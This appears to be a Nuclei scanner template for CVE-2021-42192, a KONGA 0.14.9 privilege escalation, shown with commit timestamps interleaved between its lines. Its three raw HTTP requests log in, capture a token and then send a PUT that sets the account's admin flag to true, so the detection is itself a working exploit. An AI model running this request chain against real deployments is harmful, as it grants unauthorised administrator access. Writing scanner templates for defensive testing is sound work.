2022-06-30 18:12:29 +00:00
id : CVE-2021-42192
2022-04-01 07:39:18 +00:00
info :
2022-06-30 17:39:44 +00:00
name : KONGA 0.14.9 - Privilege Escalation
2022-04-01 07:39:18 +00:00
author : rschio
severity : high
2022-06-30 17:39:44 +00:00
description : KONGA 0.14.9 allows attackers to set higher privilege users to full administration access. The attack vector is a crafted condition, as demonstrated by the /api/user/{ID} at ADMIN parameter.
2022-04-01 07:39:18 +00:00
reference :
- http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
- https://www.exploit-db.com/exploits/50521
2022-06-30 17:39:44 +00:00
- hhttps://nvd.nist.gov/vuln/detail/CVE-2021-42192
2022-07-02 12:12:07 +00:00
- https://docs.google.com/document/d/1-YU9zWiDVUps3Mb6zos3996yvZ48vW_vfOvaJLLHc4I/edit?usp=sharing
2022-04-01 07:39:18 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.8
2022-06-30 18:12:29 +00:00
cve-id : CVE-2021-42192
2022-05-17 09:18:12 +00:00
cwe-id : CWE-269
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:konga_project:konga:*:*:*:*:*:*:*:*
epss-score : 0.01324
2022-08-27 04:41:18 +00:00
tags : authenticated,edb,cve,cve2021,konga
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2022-04-01 07:39:18 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-02 09:09:25 +00:00
- raw :
- |
POST /login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
{"password": "{{password}}", "identifier": "{{username}}" }
- |
POST /api/user/{{id}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/json;charset=utf-8
{"token": "{{token}}" }
- |
PUT /api/user/{{id}} HTTP/1.1
Host : {{Hostname}}
Origin : {{BaseURL}}
Referer : {{BaseURL}}
Content-Type : application/json;charset=utf-8
{"admin": "true", "passports": {"password": "{{password}}", "protocol": "local"}, "token": "{{token}}", "password_confirmation": "{{password}}" }
req-condition : true
2022-04-01 07:39:18 +00:00
matchers-condition : and
matchers :
2022-04-02 09:09:25 +00:00
- type : dsl
dsl :
2022-04-04 12:38:25 +00:00
- 'contains(body_2, "\"admin\":false")'
- 'contains(body_3, "\"admin\":true")'
2022-04-02 09:09:25 +00:00
condition : and
2022-04-01 07:39:18 +00:00
- type : word
2022-04-02 09:09:25 +00:00
part : header
2022-04-01 07:39:18 +00:00
words :
2022-04-02 09:09:25 +00:00
- "application/json"
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
- type : status
status :
- 200
extractors :
2022-04-01 07:39:18 +00:00
- type : regex
part : body
2022-04-02 09:09:25 +00:00
name : id
internal : true
group : 1
2022-04-01 07:39:18 +00:00
regex :
2022-04-04 12:38:25 +00:00
- '"id":([0-9]+)'
2022-04-01 07:39:18 +00:00
2022-04-02 09:09:25 +00:00
- type : regex
part : body
name : token
internal : true
group : 1
regex :
2022-04-04 12:38:25 +00:00
- '"token":"(.*)"'